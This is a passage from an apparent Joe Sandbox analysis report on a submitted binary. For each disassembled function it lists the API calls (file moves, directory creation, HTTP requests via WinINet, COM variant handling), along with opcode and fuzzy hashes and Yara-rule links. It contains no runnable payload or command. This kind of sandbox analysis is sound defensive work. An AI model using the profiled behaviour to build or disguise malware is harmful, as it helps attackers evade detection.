                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                        • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                                                        • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                        • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                                                        Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 978794511-0
                                                                                                        • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                        • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                                                        • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                        • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                                                        Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                        • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                                        • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                        • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                                        Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClearVariant
                                                                                                        • String ID:
                                                                                                        • API String ID: 1473721057-0
                                                                                                        • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                        • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                                        • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                        • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                                        Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove$_memcmp
                                                                                                        • String ID: '$\$h
                                                                                                        • API String ID: 2205784470-1303700344
                                                                                                        • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                        • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                                                        • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                        • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                                                        Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                                        • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                                        • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                                        • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                                        • __swprintf.LIBCMT ref: 0045EC33
                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                                        Strings
                                                                                                        • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                                                        • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                        • API String ID: 2441338619-1568723262
                                                                                                        • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                                        • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                                                        • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                                        • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                                                        Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                                        • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                        • String ID: @COM_EVENTOBJ
                                                                                                        • API String ID: 327565842-2228938565
                                                                                                        • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                                        • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                                                        • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                                        • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                                                        Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                                                        • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                                                        • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                                                        • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00470516
                                                                                                          • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                                                          • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                                                        • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                                        • String ID: H
                                                                                                        • API String ID: 3613100350-2852464175
                                                                                                        • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                                        • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                                        • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                                        • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                                                        Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 1291720006-3916222277
                                                                                                        • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                        • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                                                        • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                        • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                                        Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                                        • IsMenu.USER32(?), ref: 0045FC5F
                                                                                                        • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                                        • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                        • String ID: 0$2
                                                                                                        • API String ID: 93392585-3793063076
                                                                                                        • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                        • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                                        • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                        • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                                        Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                                        • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                                        • String ID: crts
                                                                                                        • API String ID: 586820018-3724388283
                                                                                                        • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                        • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                                                        • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                        • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                                                        Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                                        • _wcscat.LIBCMT ref: 0044BCAF
                                                                                                        • _wcslen.LIBCMT ref: 0044BCBB
                                                                                                        • _wcslen.LIBCMT ref: 0044BCD1
                                                                                                        • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                        • String ID: \*.*
                                                                                                        • API String ID: 2326526234-1173974218
                                                                                                        • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                        • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                                                        • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                        • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                                        Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                                                        • _wcslen.LIBCMT ref: 004335F2
                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                                        • GetLastError.KERNEL32 ref: 0043362B
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                                        • _wcsrchr.LIBCMT ref: 00433666
                                                                                                          • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                        • String ID: \
                                                                                                        • API String ID: 321622961-2967466578
                                                                                                        • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                                        • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                                        • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                                        • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                                        Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
